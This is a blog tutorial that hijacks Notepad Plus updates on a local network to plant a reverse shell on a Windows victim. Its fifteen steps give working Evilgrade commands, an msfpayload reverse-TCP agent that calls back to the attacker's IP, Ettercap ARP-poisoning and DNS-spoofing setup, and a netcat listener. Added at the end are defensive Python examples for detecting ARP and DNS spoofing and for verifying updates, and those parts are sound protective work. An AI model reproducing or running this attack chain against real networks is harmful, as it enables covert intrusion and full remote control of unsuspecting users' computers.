
Wednesday, June 29, 2011

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5



What is Evilgrade?
Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has its own WebServer and DNSServer modules. It is easy to set up new settings, and it has an autoconfiguration when new binary agents are set.


From: http://www.infobytesec.com


Requirements:


1. Evilgrade


2. Backtrack 5


Step By Step : 


1. Extract Evilgrade, then run it using the commands below (the archive unpacks into the directory isr-evilgrade-2.0.0, which is the one to enter):


tar xvfz isr-evilgrade-2.0.0.tar.gz
cd isr-evilgrade-2.0.0/
./evilgrade


If there is an error when you run the application, you can refer to my post about how to solve Evilgrade errors on Backtrack 5. The picture below shows the application running successfully:



2. Next, determine the target application, because Evilgrade will create a fake update for that application and deliver it to the victim's computer. To list all supported applications, use


evilgrade>show modules 


List of modules: 
=============== 
allmynotes 
amsn 
appleupdate 
apptapp 
apt 
atube 
autoit3 
bbappworld 
blackberry 
bsplayer 
ccleaner 
clamwin 
cpan 
cygwin 
dap 
divxsuite 
express_talk 
fcleaner 
filezilla 
flashget 
flip4mac 
freerip 
getjar 
gom 
googleanalytics 
growl 
isopen 
istat 
itunes 
jet 
jetphot
linkedin 
miranda 
mirc 
nokia 
nokiasoftware 
notepadplus 
openoffice 
opera 
orbit 
osx 
paintnet 
panda_antirootkit 
photoscape 
quicktime 
skype 
sparkle 
speedbit 
sunbelt 
sunjava 
superantispyware 
teamviewer 
techtracker 
trillian 
ubertwitter 
vidbox 
virtualbox 
vmware 
winamp 
winscp 
winupdate 
winzip 
yahoomsn 


63 modules available. 


In this tutorial we will target users of Notepad Plus, so that when their application updates automatically it will be caught in the trap. To use a module, simply run


evilgrade>configure notepadplus 


3. To view the options that you can set, use the command show options.




In the image above there is a VirtualHost entry. This means that when the victim updates Notepad Plus, the application opens the URL notepad-plus.sourceforge.net; we will use this address later.


4. The next step is setting an agent. I'm configuring this agent to create a shell_reverse_tcp payload using msfpayload.


evilgrade(notepadplus)>set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]' 


Explanation: 


/pentest/exploits/framework3/msfpayload –> loads msfpayload.


windows/shell_reverse_tcp –> the Windows reverse TCP shell payload, which opens a shell on the target when the operation succeeds.


LHOST –> your Backtrack 5 IP address (the attacker's IP address).


LPORT –> the port on which you will interact with the victim when the operation succeeds. For further information about this you can refer to the readme file.


5. The next step is to start the Evilgrade server. Make sure port 80 is free (nothing else is listening on it).








6. After finishing the Evilgrade setup, we also need to configure the Man in the Middle attack using Ettercap, so that the connection is redirected to the Evilgrade server when someone updates their Notepad Plus application. The first step is to edit etter.dns.


pico /usr/share/ettercap/etter.dns 




notepad-plus.sourceforge.net –> this is the address we got in step 3.




7. For the next step we will use Ettercap.


"Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. 


It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis."

From: http://ettercap.sourceforge.net


To run Ettercap, open a new terminal (Ctrl+Alt+T) and run this command


ettercap -G 


Click Sniff –> Unified sniffing –> choose your network interface card; in this case I'm using eth0.


8. Next we need to enable the dns_spoof plugin; this plugin is used to redirect the victim's requests to the Evilgrade server. Click Plugins –> Manage the plugins –> double-click dns_spoof.




9. The next step is to scan the hosts in our network in order to determine the target. Click Hosts –> Scan for hosts.


10. After listing all the hosts in the network, we need to set the target.


11. We also need to perform the Man in the Middle attack to intercept all data on the network. Click Mitm –> Arp poisoning –> check "Sniff remote connections".


12. After everything is set up correctly, start sniffing in Ettercap.




13. Next we will use NetCat to listen on port 1234, the port we defined earlier when setting up Evilgrade.


"Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. 


It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities." 


From : http://netcat.sourceforge.net 


Open a new terminal (Ctrl+Alt+T) and run this command

nc -l -v -p 1234


Explanation:


-l : listen for an incoming connection
-v : verbose
-p : port to listen on


14. When the user opens their Notepad Plus application, the application automatically asks whether to update (as in the picture below), and the user answers YES.




15. Our NetCat terminal now has something interesting: it is already on the victim's shell.
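The attack above depends on two things a host on the LAN can observe: the ARP cache changing (the attacker's MAC answering for the gateway or other hosts) and a public update host such as notepad-plus.sourceforge.net resolving to a LAN address. As an added defender-side example, not code from the original post or from Ettercap, the script below flags both conditions from a constructed ARP table and a constructed list of DNS answers; the pinned gateway MAC and the sample addresses are assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed sample of a Linux `arp -n` table as seen on a poisoned host:
# one MAC now answers for both the gateway and another LAN host.
ARP_TABLE = """\
Address        HWtype  HWaddress           Flags Mask  Iface
192.168.8.1    ether   00:11:22:33:44:55   C           eth0
192.168.8.91   ether   00:11:22:33:44:55   C           eth0
192.168.8.120  ether   aa:bb:cc:dd:ee:01   C           eth0
"""

# Known-good gateway MAC recorded earlier (assumed value for this example).
PINNED_GATEWAY = ("192.168.8.1", "de:ad:be:ef:00:01")

def parse_arp(table):
    """Return (ip, mac) pairs from `arp -n` output, skipping the header."""
    entries = []
    for line in table.splitlines()[1:]:
        parts = line.split()
        if len(parts) >= 3 and parts[1] == "ether":
            entries.append((parts[0], parts[2].lower()))
    return entries

def arp_findings(entries, pinned_gateway=PINNED_GATEWAY):
    """Flag one MAC claiming several IPs and a gateway MAC that changed."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in entries:
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims multiple IPs: {', '.join(ips)}")
    gw_ip, gw_mac = pinned_gateway
    for ip, mac in entries:
        if ip == gw_ip and mac != gw_mac.lower():
            findings.append(f"gateway {gw_ip} MAC changed: expected {gw_mac}, saw {mac}")
    return findings

# Constructed sample DNS answers, as a resolver log might record them.
DNS_ANSWERS = [
    ("notepad-plus.sourceforge.net", "192.168.8.91"),
    ("www.example.com", "93.184.216.34"),
]

def dns_findings(answers):
    """A public update host answering with a private/local address is suspect."""
    findings = []
    for name, addr in answers:
        ip = ipaddress.ip_address(addr)
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            findings.append(f"{name} resolved to non-public address {addr}")
    return findings
```

Running both checks periodically (or on a gateway-MAC change event) turns steps 6 to 11 of the attack into an alert rather than a silent redirect.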


Countermeasures:


1. It is better to download directly from the source than to let the application update automatically.


2. Always keep your antivirus updated.
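The first countermeasure works because the attack only succeeds against an update check that trusts whatever the (spoofed) DNS name serves over plain HTTP. As an added example that is not from the original post or from Notepad Plus, the code below shows the checks a hardened update client makes: it pins the update host, uses a TLS context that validates the certificate and hostname (a spoofed host cannot present a valid certificate for the pinned name), and verifies the package digest against a manifest obtained over that channel. The manifest layout, the installer file name and the sample bytes are constructed assumptions.

```python
import hashlib
import hmac
import ssl
from urllib.parse import urlparse

# Host the client pins for updates (the VirtualHost name from the tutorial);
# assumed here to also serve the manifest that carries the package digest.
PINNED_HOST = "notepad-plus.sourceforge.net"

def tls_context():
    """TLS context that validates the chain and the hostname, so a DNS-spoofed
    server without a valid certificate for PINNED_HOST is rejected."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx

def url_is_acceptable(url):
    """Reject plain http and any host other than the pinned one."""
    p = urlparse(url)
    return p.scheme == "https" and p.hostname == PINNED_HOST

def verify_package(package_bytes, expected_sha256_hex):
    """Compare the downloaded package with the digest from the manifest."""
    actual = hashlib.sha256(package_bytes).hexdigest()
    return hmac.compare_digest(actual, expected_sha256_hex.lower())

def should_install(download_url, package_bytes, manifest):
    """manifest: dict with 'url' and 'sha256', fetched using tls_context().
    Install only if the URL is pinned and the package matches the digest."""
    if not url_is_acceptable(manifest["url"]):
        return False
    if download_url != manifest["url"]:
        return False
    return verify_package(package_bytes, manifest["sha256"])

# Constructed sample values for a stand-alone run.
GOOD_PACKAGE = b"constructed installer bytes"
MANIFEST = {"url": f"https://{PINNED_HOST}/npp-installer.exe",
            "sha256": hashlib.sha256(GOOD_PACKAGE).hexdigest()}
# The kind of URL an unauthenticated HTTP update check would have accepted.
SPOOFED_URL = "http://notepad-plus.sourceforge.net/notepadplus.exe"

if __name__ == "__main__":
    print("genuine:", should_install(MANIFEST["url"], GOOD_PACKAGE, MANIFEST))
    print("spoofed:", should_install(SPOOFED_URL, GOOD_PACKAGE, MANIFEST))
```

The digest check alone does not help if the manifest itself arrives over plain HTTP; the TLS context with hostname verification is what removes the DNS spoof from the trust path.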
